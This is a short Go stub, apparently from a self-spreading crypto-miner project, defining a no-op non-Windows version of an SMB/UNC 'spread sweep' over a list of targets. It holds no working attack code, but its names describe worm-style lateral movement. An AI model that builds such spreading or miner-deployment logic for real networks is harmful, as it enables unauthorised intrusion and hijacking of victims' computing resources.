//go:build !windows package deploy import "crypto-miner-agent/config" func runSMBUNCSpreadSweep(_ config.RuntimeConfig, _ SMBUNCSpreadOpts, targets []string) { beginSpreadSweep("smb_unc_sc", len(targets)) finishSpreadSweepImmediate() }